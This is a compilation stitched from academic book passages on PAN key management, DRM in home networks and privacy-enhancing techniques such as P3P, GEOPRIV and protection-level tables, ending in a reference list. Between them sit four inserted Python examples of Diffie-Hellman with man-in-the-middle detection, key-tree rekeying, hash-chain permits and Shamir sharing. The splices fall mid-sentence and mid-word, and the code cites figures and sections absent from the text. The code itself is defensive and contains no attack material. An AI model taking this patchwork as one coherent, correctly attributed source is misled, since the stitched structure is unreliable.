The root unit has to compute these keys in acceptable time, requiring a more complex architecture. In PANs this is usually not a problem, but when a member of a larger subnet is leaving, calculations could be more demanding. A standard group key handling method is the Tree-based Group Diffie-Hellman (TGDH), where the management steps assume that all nodes have the same processing capabilities. To ensure maximal efficiency, the highest performance unit shall be the one in the root of the tree (Hong & Lopez-Benitez, 2006). When node computing capabilities show big differences, the overhead caused by tree transformations does not represent a drawback.

Another significant group of devices that need encryption can be found in home networks, where the focus is on management of content and personal data.


SECURE HOME NETWORK AND RIGHTS MANAGEMENT

Deployment of wired or wireless home networks happens in roughly 80% of all households with broadband access (Noll, Ribeiro, & Thorsteinsson, 2005). Network-capable multimedia devices, media players, game consoles, and digital set-top boxes are widespread and part of the digital entertainment era. Content is stored within this network, and provided through the Internet to other users. Since the birth of peer-to-peer (P2P) networks, such technologies have been in the crosshairs of content providers. Recently, some software developers and a few musicians started using the torrent network for cost-effective delivery of their content. A digital rights management method designed for such networks is still missing.

Current rights protection solutions are not compatible with each other and their user friendliness also varies. The basic problem is that just a very few devices are equipped with tamper-resistant storage and integrated cryptographic capabilities. Besides software solutions, which are meant as weak solutions, hardware-based encryption can severely limit the lawful use of digital content. Recent lawsuits related to Sony's rootkit protection mechanism also reveal that customers' rights of usage are considered to be more important than the legitimate wish of content providers to protect the content.

Trusted platform modules (TPM) are the most likely candidate for content protection in hardware-based solutions. While providing encryption capabilities, it is very likely that these components will be used to dispose of the users' right to decide over their own resources.

The current discussions on DRM for audio content are regarded as minor when compared to high definition (HD) content protection. Even the connection to the screen has to use strong encryption, which has to exceed GSM/UMTS encryption in order to be acceptable for content providers. Enforcing a digital, end-to-end encrypted stream means that an HD-TV purchased at the end of 2006 may not work with the new encryption standards for HD. There is no current solution for computers to legally play full-resolution HD. By the end of 2006 it was announced that a workaround is arising to deal with the advanced content protection system of HD.

A more discreet, but not intrusive, business model discussion for digital content management
is presented in order to visualise the requirements of this market. Apple's FairPlay enables making backup copies of audio tracks, which is permitted by law in several European countries, and copying of content between the user's iPod players. This solution is considered to be too open for some content providers, and the distribution is limited to a server-client infrastructure. For HD content with high bandwidth needs such a server-client infrastructure is not advisable, both from a server and a network point of view. The ever-growing size of P2P networks forms a perfect infrastructure to deliver content with high bandwidth needs practically without substantial transmission costs. P2P networks are usually run without any DRM support. An additional infrastructure supporting DRM in a P2P network used to transmit content will enable high volume distribution of digital content (Pfeifer, Savage, Brazil, & Downes, 2006). If seamless license delivery and user privacy could be guaranteed, such a network could be the foundation of a low cost content delivery scheme.

While the usage of P2P networks is an excellent idea, the recommended solution proposed by Nützel and Beyer (2006) is similar to Sony's rootkit solution: it bypasses user control and is thus not acceptable. While the primary goal is to secure content, the software used in such solutions acts like a hidden Trojan and opens backdoors not only for the content providers, but also for other hackers.

Content usage across platforms is not supported yet, as a common standard does not exist. Pfeifer et al. (2006) suggest a common management platform for DRM keys with an XML-based, standard MPEG-REL framework. Users will also produce content with digital protection, in order to ensure that personal pictures cannot be distributed electronically. Social networks and groups of interest, as well as distribution of content in PANs, are a challenge for DRM development. Zou, Thukral, and Ramamurthy (2006) and Popescu, Crispo, Tanenbaum, and Kamperman (2004) propose a key delivery architecture for device groups, which could be extended by a local license manager. The central key management unit could distribute licenses seamlessly to the device which wants to get access, without invading the user experience.

Kálmán and Noll (2006) recommend a phone-based solution. This represents a good trade-off between user experience and content protection. The phone is practically always online, and most of them have Bluetooth or other short range radio transmitters, so licenses can be transmitted on demand. Since the phone has a screen and a keyboard, it is possible to request authorisation from the user before every significant message exchange, so the user can control the way licenses are distributed.

Leaving aside the issues related to business aspects, computational issues still remain. Highly secure DRM entities will use asymmetric encryption and certificates. Sur and Rhee (2006) recommend a device authentication architecture which eliminates traditional public key operations except the ones on the coordinator device. This is achieved by using hash chains including the permission; for example, a device can get keys to play a designated audio track ten times or permission to use five daily permits on demand. Such schemes allow end devices to be simpler and lower the network communication overhead.

If a central device is not appreciated, a composite key management scheme may be used. The parties in the PAN will form a web of trust like in a confidentiality scheme, for example pretty good privacy (PGP). In this web, the main key is split between nodes and cooperation is needed for significant operations. This means that if the scheme is operating on a (k, n) basis, k-1 nodes can be lost before the system needs to generate a new key. Fu, He, and Li (2006) mention the PAN's ad hoc nature as the biggest problem. Since this scheme selects n nodes randomly, the ones that are moving between networks fast can cause instability in the system. Also, the resource need of this proposal is quite high on all nodes present.

When a scheme enables off-line use of license keys, attention should be given to problems arising from leaving or compromised nodes. Identity-based schemes have become popular recently because of their efficiency in key distribution. The main drawback is that these proposals do not provide a solution for revocation and key renewal. Hoeper and Gong (2006) propose a solution based on a heuristic (z, m) method. The solution is similar
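As an added example (not the chapter's own code), the following Python models the Diffie-Hellman exchange of Figure 2 together with the two remedies the chapter discusses: a session key derived by hashing the DH secret with both parties' random values (the freshness idea of Kwak, Oh, and Won), and an HMAC over the exchanged values under a preshared key, so that a substituted public value is detected rather than silently accepted. All function names are this example's own, and the 256-bit safe prime is generated on the fly only to keep the demo fast.

```python
"""Diffie-Hellman agreement, hash-derived session keys and a PSK-bound transcript check.
Added example; not code from the chapter's authors or any cited work."""
import hashlib
import hmac
import math
import secrets

# Small-prime sieve applied before Miller-Rabin (all names here are this example's own).
SMALL_PRIMES = [p for p in range(3, 2000) if all(p % d for d in range(2, int(p ** 0.5) + 1))]
PRIMORIAL = math.prod(SMALL_PRIMES)


def is_probable_prime(n: int, rounds: int = 32) -> bool:
    """Miller-Rabin test for odd n > 3."""
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = 2 + secrets.randbelow(n - 3)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_safe_prime(bits: int) -> int:
    """Return p = 2q + 1 with p and q prime, so DH runs in a large prime-order subgroup.
    256 bits keeps this demo fast; deployments use standardised 2048-bit or larger groups."""
    while True:
        q = secrets.randbits(bits - 1) | (1 << (bits - 2)) | 1
        p = 2 * q + 1
        if math.gcd(q * p, PRIMORIAL) == 1 and is_probable_prime(q) and is_probable_prime(p):
            return p


GENERATOR = 4  # a square mod p, hence a generator of the order-q subgroup


def dh_keypair(p: int):
    q = (p - 1) // 2
    x = 1 + secrets.randbelow(q - 1)          # private exponent in [1, q-1]
    return x, pow(GENERATOR, x, p)            # (private, public)


def to_bytes(n: int, p: int) -> bytes:
    return n.to_bytes((p.bit_length() + 7) // 8, "big")


def session_key(shared: int, p: int, nonce_a: bytes, nonce_b: bytes) -> bytes:
    """Freshness: both parties' random nonces enter the hash together with the DH secret."""
    return hashlib.sha256(to_bytes(shared, p) + nonce_a + nonce_b).digest()


def transcript_tag(psk: bytes, p: int, pub_a: int, pub_b: int, nonce_a: bytes, nonce_b: bytes) -> bytes:
    """HMAC over everything sent over the air, keyed with the preshared secret.
    Plain DH authenticates nobody; this tag ties the exchange to a peer who knows the PSK."""
    transcript = to_bytes(pub_a, p) + to_bytes(pub_b, p) + nonce_a + nonce_b
    return hmac.new(psk, transcript, hashlib.sha256).digest()


def run_exchange(p: int, psk: bytes, interposed: bool = False) -> dict:
    """A and B run DH. With `interposed`, a third party replaces the public values in both
    directions with its own (the man-in-the-middle of Figure 3); the PSK-bound tag exposes it."""
    xa, pub_a = dh_keypair(p)
    xb, pub_b = dh_keypair(p)
    nonce_a, nonce_b = secrets.token_bytes(16), secrets.token_bytes(16)
    seen_by_b, seen_by_a = pub_a, pub_b
    if interposed:
        _, pub_m = dh_keypair(p)
        seen_by_b = seen_by_a = pub_m
    key_a = session_key(pow(seen_by_a, xa, p), p, nonce_a, nonce_b)
    key_b = session_key(pow(seen_by_b, xb, p), p, nonce_a, nonce_b)
    # A tags its own view of the transcript; B verifies against what B actually received.
    tag_from_a = transcript_tag(psk, p, pub_a, seen_by_a, nonce_a, nonce_b)
    expected_at_b = transcript_tag(psk, p, seen_by_b, pub_b, nonce_a, nonce_b)
    return {"keys_match": key_a == key_b,
            "transcript_ok": hmac.compare_digest(tag_from_a, expected_at_b)}


P = gen_safe_prime(256)

if __name__ == "__main__":
    psk = secrets.token_bytes(32)
    print("honest exchange:    ", run_exchange(P, psk))
    print("interposed exchange:", run_exchange(P, psk, interposed=True))
```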
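The binary key tree of the Authentication of Device Groups section, as an added example that is neither the scheme of Kim et al. (2006) nor TGDH: a manager holds every node key, each member holds the keys on its leaf-to-root path, and a departure is handled by one rekey message built from hash and XOR only. Class and function names are this example's own.

```python
"""Logical key tree for a device group with a single trusted manager.
Added example; not the construction of any work the chapter cites."""
import hashlib
import secrets

KEY_LEN = 32


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def label(epoch: int, node: int, child: int) -> bytes:
    return b"%d|%d|%d" % (epoch, node, child)


def wrap(kek: bytes, key: bytes, lbl: bytes) -> bytes:
    """Mask `key` with a pad derived from the wrapping key; the (epoch, node, child) label is
    unique per use so no pad repeats. Stand-in for the AEAD a deployment would use."""
    return xor(key, hashlib.sha256(kek + lbl).digest())


unwrap = wrap  # XOR masking is its own inverse


class KeyTreeManager:
    """Heap-indexed full binary tree: node i has children 2i and 2i+1, root is 1,
    member m sits at leaf n + m. Every internal key is the group key of the leaves below it."""

    def __init__(self, n_members: int):
        assert n_members & (n_members - 1) == 0, "demo assumes a power-of-two tree"
        self.n = n_members
        self.keys = {i: secrets.token_bytes(KEY_LEN) for i in range(1, 2 * n_members)}
        self.present = set(range(n_members, 2 * n_members))
        self.epoch = 0

    @staticmethod
    def path(node: int) -> list:
        out = []
        while node >= 1:
            out.append(node)
            node //= 2
        return out

    def member_view(self, member: int) -> dict:
        """Keys handed over at join time: the leaf key plus every ancestor (group) key."""
        return {i: self.keys[i] for i in self.path(self.n + member)}

    def has_members(self, node: int) -> bool:
        lo = hi = node
        while lo < self.n:                      # descend to the leaf range under `node`
            lo, hi = 2 * lo, 2 * hi + 1
        return any(leaf in self.present for leaf in range(lo, hi + 1))

    def leave(self, member: int) -> list:
        """Forward secrecy on departure: fresh keys from the parent of the leaving leaf up to
        the root, each wrapped for every still-populated child, sent as one message."""
        leaf = self.n + member
        self.present.discard(leaf)
        self.keys.pop(leaf)
        self.epoch += 1
        message = []
        for node in self.path(leaf)[1:]:        # bottom-up: lower keys are fresh before reuse
            self.keys[node] = secrets.token_bytes(KEY_LEN)
            for child in (2 * node, 2 * node + 1):
                if child in self.keys and self.has_members(child):
                    blob = wrap(self.keys[child], self.keys[node], label(self.epoch, node, child))
                    message.append((node, child, blob))
        return message


class Member:
    def __init__(self, ident: int, keys: dict):
        self.ident, self.keys = ident, dict(keys)

    def process(self, message: list, epoch: int) -> None:
        for node, child, blob in message:
            if child in self.keys:              # only entries wrapped under a key this member holds
                self.keys[node] = unwrap(self.keys[child], blob, label(epoch, node, child))

    def group_key(self) -> bytes:
        return self.keys.get(1)


def demo(n_members: int = 8, leaver: int = 3) -> dict:
    manager = KeyTreeManager(n_members)
    members = [Member(i, manager.member_view(i)) for i in range(n_members)]
    old_root = manager.keys[1]
    message = manager.leave(leaver)
    for m in members:
        m.process(message, manager.epoch)       # the leaver sees the broadcast too
    staying = [m for m in members if m.ident != leaver]
    return {
        "entries": len(message),                # 2*log2(n) - 1 wrapped keys
        "root_changed": manager.keys[1] != old_root,
        "staying_synced": all(m.group_key() == manager.keys[1] for m in staying),
        "leaver_locked_out": members[leaver].group_key() != manager.keys[1],
    }


if __name__ == "__main__":
    print(demo())
```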
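An added example (not Sur and Rhee's code) of the hash-chain permits described above, covering the off-line use the chapter also mentions: the player holds only the chain anchor and checks one hash per use, the chain length is the number of plays, and replayed, out-of-order or forged permits are refused. Names are this example's own; delivery of the anchor to the player is assumed to happen over an authenticated channel (the coordinator's one public-key step, not shown).

```python
"""Hash-chain usage permits: one hash per use on the end device, no public-key code.
Added example; not the scheme of Sur and Rhee (2006)."""
import hashlib
import secrets


def H(x: bytes) -> bytes:
    return hashlib.sha256(x).digest()


class PermitIssuer:
    """Holds the chain seed; releases the next preimage each time a use is authorised."""

    def __init__(self, uses: int):
        self.seed = secrets.token_bytes(32)
        self.uses = uses
        self.released = 0
        self.anchor = self.seed                  # anchor = H^uses(seed); the player gets only this
        for _ in range(uses):
            self.anchor = H(self.anchor)

    def next_permit(self) -> bytes:
        """The i-th permit is H^(uses-i)(seed); hashing it once yields the previous permit."""
        if self.released >= self.uses:
            raise RuntimeError("all uses consumed; a new licence is needed")
        self.released += 1
        value = self.seed
        for _ in range(self.uses - self.released):
            value = H(value)
        return value


class Player:
    """End device: accepts a permit only if it hashes to the last accepted value."""

    def __init__(self, anchor: bytes, uses: int):
        self.last_accepted = anchor
        self.remaining = uses

    def redeem(self, permit: bytes) -> bool:
        if self.remaining == 0 or H(permit) != self.last_accepted:
            return False                         # forged, replayed, or out of order
        self.last_accepted = permit
        self.remaining -= 1
        return True


def play_track(uses: int = 10) -> dict:
    """Ten plays of one track, with the permits fetched up front for off-line use."""
    assert uses >= 5
    issuer = PermitIssuer(uses)
    player = Player(issuer.anchor, uses)
    permits = [issuer.next_permit() for _ in range(uses)]
    accepted = sum(player.redeem(p) for p in permits[:3])
    replay_rejected = not player.redeem(permits[1])            # already consumed
    skip_rejected = not player.redeem(permits[4])              # skips ahead in the chain
    forgery_rejected = not player.redeem(secrets.token_bytes(32))
    accepted += sum(player.redeem(p) for p in permits[3:])
    try:
        issuer.next_permit()
        exhausted = False
    except RuntimeError:
        exhausted = True
    return {"accepted": accepted, "replay_rejected": replay_rejected,
            "skip_rejected": skip_rejected, "forgery_rejected": forgery_rejected,
            "issuer_exhausted": exhausted}


if __name__ == "__main__":
    print(play_track())
```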
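Added example of the (k, n) split of the PAN master key mentioned above, using Shamir's threshold scheme over a prime field (the composite scheme of Fu, He, and Li is not reproduced): any k of the n shares rebuild the key, while k-1 shares yield nothing usable, which is the cooperation property the paragraph describes. Function names are this example's own.

```python
"""(k, n) threshold sharing of a 32-byte master key. Added example; not the chapter's code."""
import secrets

PRIME = (1 << 521) - 1   # Mersenne prime M521, so a 32-byte key fits as one field element


def split_key(key: bytes, k: int, n: int) -> list:
    """Shares are points (i, f(i)) on a random degree k-1 polynomial with f(0) = key."""
    assert 1 <= k <= n and len(key) <= 64
    secret = int.from_bytes(key, "big")
    coeffs = [secret] + [secrets.randbelow(PRIME) for _ in range(k - 1)]
    shares = []
    for i in range(1, n + 1):
        y = 0
        for c in reversed(coeffs):              # Horner evaluation mod PRIME
            y = (y * i + c) % PRIME
        shares.append((i, y))
    return shares


def recover_key(shares: list, key_len: int):
    """Lagrange interpolation at x = 0. With at least k distinct shares this is the key;
    with fewer, the polynomial is underdetermined and the value is unrelated to the key."""
    secret = 0
    for i, yi in shares:
        num = den = 1
        for j, _ in shares:
            if j != i:
                num = num * (-j) % PRIME
                den = den * (i - j) % PRIME
        secret = (secret + yi * num * pow(den, PRIME - 2, PRIME)) % PRIME
    if secret >= 1 << (8 * key_len):            # cannot be a key of this length
        return None
    return secret.to_bytes(key_len, "big")


def demo(k: int = 3, n: int = 5) -> dict:
    master = secrets.token_bytes(32)
    shares = split_key(master, k, n)
    return {
        "rebuilt_from_k": recover_key(shares[:k], 32) == master,
        "rebuilt_from_other_k": recover_key(shares[n - k:], 32) == master,
        "k_minus_one_fails": recover_key(shares[:k - 1], 32) != master,
    }


if __name__ == "__main__":
    print(demo())
```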


Privacy-Enhancing Technique

lature and self-regulatory programs in helping to enforce Web site policies.

APPEL (World Wide Web Consortium [W3C], 2002) can be used to express what a user expects to find in a privacy policy. P3P and APPEL merely provide a mechanism to describe the intentions of both sides rather than means to protect user data after agreeing to use the service.

There are several privacy-related tools that are based on the P3P and APPEL specifications. AT&T's (n.d.) Privacy Bird is a free plug-in for Microsoft® Internet Explorer. It allows users to specify privacy preferences regarding how a Web site stores and collects data about them. If the user visits a Web site, Privacy Bird analyzes the policy provided and indicates whether or not the policy fits the user's preferences. Microsoft® Internet Explorer 6 (Microsoft, n.d.) and Netscape® 7 (Netscape, n.d.) embed a similar behaviour. They allow the user to set some options regarding cookies and are capable of displaying the privacy policy in human-readable format. All these tools are a valuable step in the right direction, but they still lack means to personalize privacy policies. Steps towards personalized privacy policies are discussed by Maaser and Langendoerfer (2005) and Preibusch (2005). In Preibusch a fine-grained choice from a set of offered policies is proposed, whereas a form of bargaining in which neither party fully publishes all its options is proposed in Maaser and Langendoerfer.

Privacy policies allow for "opting out" of or "opting in" to certain data or data uses. But they do not provide technical protection means. The user has no control over the actual abidance of the policy but still has to trust that his/her personal data is processed in accordance with the stated P3P policy only. Enforcement of policy abidance could be done by hippocratic databases or other means.

2. IETF's GeoPriv

GEOPRIV is a framework (Cuellar, Morris, Mulligan, Peterson, & Polk, 2004) that defines four primary network entities: (1) a location generator, (2) a location server, (3) a location recipient, and (4) a rule holder. For appropriate interaction between those, three interfaces are defined, including a publication interface and a notification interface. GEOPRIV specifies that a "using protocol" is employed to transport location objects from one place to another. Location recipients may request a location server to retrieve GEOPRIV location information concerning a particular target. The location generator publishes location information to a location server. Such information can then be distributed to location recipients in coordination with policies set by the rule maker, for example, the user whose position is stored.

A using protocol must provide some mechanism allowing location recipients to subscribe persistently in order to receive regular notifications of the geographical location of the target as its location changes over time. Location generators must be enabled to publish location information to a location server that applies further policies for distribution.

One of the benefits of this architecture is that the privacy rules are stored as part of the location object (Cuellar et al., 2004). Thus, nobody can claim that he/she did not know that access to the location information was restricted. But misuse is still possible and it is still not hindered by technical means.

Server Side Means

In order to ensure privacy after agreeing to a certain privacy policy or privacy contract, suitable means on the data gathering side are needed. Such could be hippocratic databases (Agrawal, Kiernan, Srikant, & Xu, 2002), HP Select Access (Casassa, Thyne, Chan, & Bramhall, 2005), Carnival (Arnesen, Danielsson, & Nordlund, 2004), or PrivGuard (Lategan & Olivier, 2002). All these systems check whether an agreed individual privacy policy allows access to certain data for the stated purpose and by the requiring entity.

There are several approaches that try to protect privacy in location-aware middleware platforms (Bennicke & Langendörfer, 2003; Gruteser & Grunwald, 2003; Langendörfer & Kraemer, 2002; Synnes, Nord, & Parnes, 2003; Wagealla, Terzis,
& English, 2003). In Langendörfer and Kraemer; Bennicke and Langendörfer; and Wagealla et al., means are discussed that enable the user to declare how much information he/she is willing to reveal. In Synnes et al. the authors discuss a middleware that uses user-defined rules which describe who may access the user's position information and under which circumstances. The approach investigated in Gruteser and Grunwald intentionally reduces the accuracy of the position information in order to protect privacy. All these approaches lack means to enforce access to user data according to the access policy defined by users. A combination of the location-aware middleware platforms with the protection means sketched previously would clearly improve user privacy. A first step in this direction was reported in Langendörfer, Piotrowski, and Maaser (2006), where users are enabled to generate Kerberos tokens on their own device and where the platform checks these tokens before granting access to user data.


ASSESSMENT OF PRIVACY-ENHANCING TECHNIQUES

In this section we discuss the protection level that can be achieved by applying privacy-enhancing techniques. In order to clarify how different classes of approaches affect user privacy we resume our example from the Privacy Protection Goals section and show which data is protected by which means. Thereafter we identify the protection level achieved by each class of protection means.

Evaluation of Presented Techniques

For the evaluation of the privacy-enhancing techniques we resume our example. Table 2 shows that each class of privacy-enhancing techniques has its own merit and is applicable for a specific type of information. The fact that all techniques have been designed to protect specific information allows easy combination of several approaches to improve user privacy. In the case of e-cash with revocable anonymity the use of different pseudonyms is essential in order to prevent service providers from linking individual transactions by using unaltered pseudonyms. Along these lines, the use of identity management systems becomes essential in order to ensure that all pseudonyms are used correctly when interacting with service providers. In addition, support for the generation of pseudonyms can be of help in order to guarantee a minimal level of pseudonym quality.

In Table 2 we have not included descriptive and server-side approaches. With the former the data gathered depends on user preferences, and the latter provides protection against misuse only after the fact, that is, it has no influence on the data accumulated in a certain service provider's database.

Protection Level

In order to assess the protection a certain PET can provide we use a classification with four protection levels:

• High: Technical means are given to ensure that the amount of data that can be gathered by a service provider is restricted to a minimum or matches the user's requirements. So, no detailed information can be deduced from gathered data. The downside is that no value-added services can be provided or a service may not be provided at all.

• Medium: The data that are gathered can not only be determined by the user, but he/she keeps some control over them. This control might be either an active data control, that is, an obeyed request for deletion, or passive control that specifies certain rules on how these data shall be dealt with in the future or for certain purposes.

• Low: The user can determine which of his/her data is gathered. Especially if there are no proven technical means to protect the data, it is the task of the service provider to ensure the security of the gathered data. The drawbacks for service providers could be that users are hesitant to use their service if they cannot prove the security/privacy of the data.
• None: The user, respectively the owner of the data, has no influence on the kind of data that is gathered or on which information gets inferred or derived. In addition, the service provider or data collector respectively applies no appropriate means to protect the information or privacy. In this case we cannot speak of privacy at all. Such an environment enables service providers or others to gather as much and almost any data they want. Besides the drawback for service users of having no privacy at all, it most likely diminishes the trust of the users or potential customers respectively in such services.

Table 2. The sets of user data each party can link per transaction. The positioning system can get information only if the user role is passive, that is, the system tracks the user.

Party | unprotected | pseudonyms | anonymous e-cash
User | 1. Identity; 2. Location; 3. Service provider; 4. Purchase details | 1. Identity; 1.1 Location system user pseudonym; 1.2 Service user pseudonym; 1.3 E-cash user pseudonym; 2. Location; 3. Service provider; 4. Purchase details | 1. Identity; 1.1 Location system user pseudonym; 1.2 Service user pseudonym; 2. Location; 3. Service provider; 4. Purchase details
Positioning system | (1); (2) | (1.1); (2) | (1.1); (2)
Location handling subsystem | 1; 2; 3 | 1.1; 2; 3 | 1.1; 2; 3
Service provider | 1; 2; 3; 4 | 1.1; 1.2; 1.3; 2; 3; 4 | 1.1; 1.2; 2; 3; 4
Payment provider | 1; 3 | 3 | 3
Network unencrypted | 1; 2; 3; 4 | 1.1; 1.2; 1.3; 2; 3; 4 | 1.1; 1.2; 2; 3; 4
Network encrypted | 3 | 3 | 3
Network with MIX | - | - | -

In the classification of the PET according to protection levels we are focussing on the strength of the classes of mechanism and neglect the side effects. We are aware of the fact that real system properties such as the number of participants have a significant impact on the protection level. For example, anonymous e-cash schemes provide a high level of protection since they prevent the user's bank from learning about the user's online purchase habits as well as the service provider from revealing the user's identity. But if the anonymous e-cash scheme is used by a single customer of the bank only, the protection provided by the anonymous e-cash scheme collapses to the protection against the service provider, since the bank can easily link the e-coins to the user's identity.

Table 3 shows the protection level of all presented classes of privacy-enhancing techniques such as mix networks and so forth. Here we did not consider individual differences in a class, since weighting the individual drawbacks of similar approaches depends much on personal preferences, and technical differences are already discussed in the Discussion of Privacy-Enhancing Techniques section.

Table 3. Protection level of the individual privacy-enhancing techniques at network and application level

Level             | Mix networks | Pseudonyms | Anonymous e-cash | Descriptive approaches (DA) | DA + server side technologies | Location protection
------------------|--------------|------------|------------------|-----------------------------|-------------------------------|--------------------
Application level | none         | medium     | high             | low                         | low - medium                  | medium
Network level     | high         | none       | none             | none                        | none                          | none

CONCLUSION

In this chapter we have presented privacy-enhancing techniques that have evolved during the last decades. If all these techniques are combined and used in the correct way, user privacy is reasonably protected. The sad point here is that despite the fact that some of these approaches are quite well understood, they are still not in place. So although privacy protection is theoretically possible, in the real world it is hard to achieve. Only different versions of Chaum's (1981) mix network approach and P3P (Cranor et al., 2002)/APPEL (W3C, 2002) are currently in place to protect user privacy, and experienced Internet users are using different pseudonyms while browsing the Web or doing e- or m-commerce.

From our perspective, most of the privacy-enhancing techniques still suffer from acceptance issues. Anonymous e-cash lacks support from banks. Service providers might also be reluctant to accept fully anonymous e-cash due to the challenging fraud protection mechanisms involved. Even using mix networks is problematic nowadays. Many service providers block their access if they recognize usage of mix networks. Officially it is mostly justified with crime prevention, though it can be assumed that they do not want to lose valuable additional user information.

The paradigm shift in Internet use from wired to wireless also leads to new challenges. Resource-consuming privacy-enhancing techniques cannot be applied by mobile service users. This holds especially true for the use of mix networks.

New technologies such as Web 2.0 allow completely new kinds of attacks. In Rao and Rohatgi (2000) and Novak, Raghavan, and Tomkins (2004) the individual way of writing was described as a means to link pseudonyms together. As long as service users are only entering a pseudonym and an e-mail address into Web forms they are still safe, but writing exhaustive comments in news groups or blogs provides sufficient material to link pseudonyms.

Pervasive computing is going to become a real challenge for privacy-enhancing techniques. A lot of information can be gathered by the environment and up to now it is still an open issue how such an environment can be adjusted to individual privacy preferences.

ADDITIONAL READING

Additional reading can be found on the Web pages of the EU projects Future of Identity in the Information Society (FIDIS), Privacy and Identity Management for Europe (PRIME), and Safeguards in a World of AMbient Intelligence (SWAMI). The first two projects are focusing on identity-management issues whereas SWAMI deals with privacy issues in pervasive environments. The research agenda of FIDIS (http://www.fidis.net) includes virtual identities, embodying concepts such as pseudonymity and anonymity. PRIME (https://www.prime-project.eu) aims to develop a working prototype of a privacy-enhancing identity management system. In contrast to other research projects PRIME also aims at fostering market adoption of PETs. Privacy issues in pervasive environments have not been intensively investigated by the research community in recent years. A first attempt is made by the SWAMI project (http://swami.jrc.es), which focused on AMI projects, legal aspects, scenarios, and available PET.

The workshop series "Privacy Enhancing Technologies" published in Springer's LNCS series (2482, 2760, 3856, 3424, 4258) provides a great variety of publications dealing with technological, social, and legal aspects of privacy.

REFERENCES

Agrawal, R., Kiernan, J., Srikant, R., & Xu, Y. (2002, August 20-23). Hippocratic databases. In Proceedings of the 28th International Conference on Very Large Data Bases. Hong Kong, China.

Anton, A. I., He, Q., & Baumer, D. L. (2004). Inside JetBlue's privacy policy violations. IEEE Security & Privacy.

Arnesen, R. R., Danielsson, J., & Nordlund, B. (2004, November 4-5). Carnival: An application framework for enforcement of privacy policies. Paper presented at the 9th Nordic Workshop on Secure IT-systems. Helsinki, Finland.

AT&T Corporation. (n.d.). AT&T privacy bird. Retrieved January 1, 2007, from http://privacybird.com

Barbaro, M., & Zeller, Jr., T. (2006, August 9). A face is exposed for AOL searcher no. 4417749. New York Times. Retrieved from http://www.nytimes.com/2006/08/09/technology/09aol.html

Bennicke, M., & Langendörfer, P. (2003). Towards automatic negotiation of privacy contracts for Internet services. In Proceedings of the 11th IEEE Conference on Networks (ICON 2003). IEEE Society Press.

Berthold, O., & Köhntopp, M. (2000, July 25-26). Identity management based on P3P. In Proceedings of the Workshop on Design Issues in Anonymity and Unobservability. Berkeley, CA.

Brands, S. (1993). Untraceable off-line cash in wallets with observers. In Proceedings of Crypto '93 (LNCS 773, pp. 302-318). Springer-Verlag.

Casassa Mont, M., Thyne, R., Chan, K., & Bramhall, P. (2005). Extending HP identity management solutions to enforce privacy policies and obligations for regulatory compliance by enterprises. HPL-2005-110. Retrieved January 1, 2007, from http://www.hpl.hp.com/techreports/2005/HPL-2005-110.html

Chaum, D. (1981). Untraceable electronic mail, return addresses, and digital pseudonyms. Communications of the ACM, 24(2).

Chaum, D. (1985). Security without identification: Transaction systems to make big brother obsolete. Communications of the ACM, 28(10), 1030-1044.

Cranor, L. F. (2000). Beyond concern: Understanding net users' attitudes about online privacy. In I. Vogelsang & B. M. Compaine (Eds.), The Internet upheaval: Raising questions, seeking answers in communications policy (pp. 47-70). Cambridge, MA: The MIT Press.

Cranor, L., Langheinrich, M., Marchiori, M., Presler-Marshall, M., & Reagle, J. (2002, April 16). The platform for privacy preferences 1.0 (P3P1.0) specification. Retrieved January 1, 2007, from http://www.w3.org/TR/P3P/

Cuellar, J., Morris, J., Mulligan, D., Peterson, J., & Polk, J. (2004). GEOPRIV requirements (RFC 3693). Retrieved from http://www.rfc-archive.org/getrfc.php?rfc=3693

Federal Trade Commission (FTC). (1999). The FTC's first five years: Protecting consumers online. Retrieved from http://www.ftc.org

Gruteser, M., & Grunwald, D. (2003, May 5-8). Anonymous usage of location-based services through spatial and temporal cloaking. Paper presented at the ACM/USENIX International Conference on Mobile Systems, Applications, and Services (MobiSys). San Francisco, CA.



Jendricke, U., & Gerd tom Markotten, D. (2000). Usability meets security—The identity-manager as your personal security assistant for the Internet. In Proceedings of the 16th Annual Computer Security Applications Conference (ACSAC '00), New Orleans, LA (pp. 344-353).

Jia, G., Brebner, G., & D'Uriage, M. (2004). Privacy protection system and method. U.S. Patent: US 2004/0181683 A1.

Koch, M., & Wörndl, W. (2001). Community support and identity management. In Proceedings of the European Conference on Computer Supported Cooperative Work (ECSCW 2001), Bonn, Germany.

Langendörfer, P., & Kraemer, R. (2002). Towards user defined privacy in location-aware platforms. In Proceedings of the 3rd International Conference on Internet Computing. CSREA Press.

Langendörfer, P., Piotrowski, K., & Maaser, M. (2006). A distributed privacy enforcement architecture based on Kerberos. WSEAS Transactions on Communications, 5(2), 231-238.

Lategan, F. A., & Olivier, M. S. (2002). PrivGuard: A model to protect private information based on its usage. South African Computer Journal, 29, 58-68.

Maaser, M., & Langendoerfer, P. (2005, July 26-28). Automated negotiation of privacy contracts. Paper presented at the Computer Software and Applications Conference, Edinburgh, Great Britain.

Microsoft. (n.d.). Microsoft announces privacy enhancements for Windows, Internet Explorer. Retrieved January 1, 2007, from http://www.microsoft.com/presspass/press/2000/Jun00/P3Ppr.asp

Netscape. (n.d.). Netscape 7.0—7.2 release notes. Retrieved January 1, 2007, from http://wp.netscape.com/eng/mozilla/ns7/relnotes/7.html#psm

Novak, J., Raghavan, P., & Tomkins, A. (2004). AntiAliasing on the Web. In Proceedings of the 13th International Conference on World Wide Web, New York.

Peterson, J. (2005). A presence architecture for the distribution of GEOPRIV location objects (RFC 4079). Retrieved from http://www.ietf.org/rfc/rfc4079.txt

Preibusch, S. (2005, July 19-22). Implementing privacy negotiation techniques in e-commerce. In Proceedings of the 7th IEEE International Conference on E-Commerce Technology (IEEE CEC 2005). Technische Universität München, Germany.

Project: AN.ON—Anonymity.Online. (n.d.). Protection of privacy on the Internet. Retrieved January 1, 2007, from http://anon.inf.tu-dresden.de/index_en.html

Rao, J. R., & Rohatgi, P. (2000). Can pseudonymity really guarantee privacy? In Proceedings of the Ninth USENIX Security Symposium.

Reed, M., Syverson, P., & Goldschlag, D. (1998). Anonymous connections and onion routing. IEEE Journal on Selected Areas in Communications, 16(4).

